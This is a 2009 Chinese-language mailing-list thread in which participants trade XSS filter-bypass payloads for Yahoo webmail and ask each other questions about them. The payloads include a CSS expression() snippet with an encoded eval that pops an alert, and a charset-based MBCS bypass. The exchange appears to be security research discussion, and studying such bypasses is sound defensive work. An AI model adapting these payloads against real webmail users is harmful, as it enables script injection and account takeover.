呵...原来我被一个过时的问题困挠如此久...
...看来以后要多上议论关注..



2009/6/3 vul crack <[email protected]>

> 字符集已经过时了,去年到今年一直是语法绕过!
>
> 在 09-6-2,阿賢<[email protected]> 写道:
>  > 二楼的是的似乎不是用字符集bypass.而描述里说的是MBCS环境字符集bypass.而据我所知yahoo字符是utf-8,无奈ing.
> > 我希望大家可以交流分享一下各webmail XSS的代码,我在此先放出一段的代码.(可惜上星期己失效)
> > <style>div{font:'\'
> >
> ';'}a';background-image:expression((window.rrr==1)?'':eval('rrr=1;eval(unescape(%27%61%6C%65%72%74%28%2F%78%73%73%2F%29%27));'));}'{}</style><div
> > id="myp">hhhhh</div>
> >
> > 2009/6/2 vul crack <[email protected]>
> >
> >> yahoo xss
> >>
> 今年的研究速度明显慢于去年,去年下半年爆了那么多,但是基本一周新的就能出来,今年到现在已经是第三个了,爆了两次,每次的研究时间变成10天左右了,不知道下半年形式会怎么样?
> >>
> >> 在 09-5-31,阿賢<[email protected]> 写道:
> >> >   n<style>
> >> > #x{
> >> > background: url('http://www.google.cn{chr}');background: url('http://
> >> > ;color:red;www.google.cn');
> >> > }
> >> > </style>
> >> > <div id="x">codz</div>
> >> > 描述:
> >> >   nYahoo修复过在html属性里出现的字符集问题
> >> > n字符集问题不只出现在html属性,同样存在于css,js等地方
> >> > nYahoo的Filter基于语法分析,语法分析的时候为非MBCS字符集
> >> > nFilter没有处理好在css里的非法字符,导致MBCS环境下的xss
> >> >
> >> >
> 问:窃以为Exploit里chr便是代码写入触发CSS的地方.却一直没有明白这样的语句究竟如何能触发CSS.更不明白后面;background:
> >> > url('http://;color:red;www.google.cn'); .恳请大家给与指导.
> >> >
> >> > >
> >> >
> >>
> >> >
> >>
> >
> > >
> >
>
> >
>

--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [email protected]
-~----------~----~----~----~------~----~------~--~---

回复